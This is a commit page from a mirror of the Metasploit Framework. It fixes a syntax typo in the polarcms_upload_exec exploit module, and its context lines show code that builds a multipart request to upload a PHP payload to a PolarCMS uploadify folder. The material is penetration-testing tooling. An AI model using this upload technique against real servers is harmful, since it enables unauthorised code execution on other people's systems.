infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix polarcms_upload_exec exploit

bug/bundler_fix
Joe Rozner 2013-02-25 22:58:26 -08:00
parent 0158919031
commit abdcde06cd
1 changed files with 1 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
modules/exploits/multi/http/polarcms_upload_exec.rb
View File

@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
data = Rex::MIME::Message.new data = Rex::MIME::Message.new
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"") data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/',, nil, nil, "form-data; name=\"folder\"") data.add_part(normalize_uri(uri, 'includes', 'jquery.uploadify/', nil, nil, "form-data; name=\"folder\""))
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
print_status("#{peer} - Uploading payload #{@payload_name}") print_status("#{peer} - Uploading payload #{@payload_name}")
res = send_request_cgi({ res = send_request_cgi({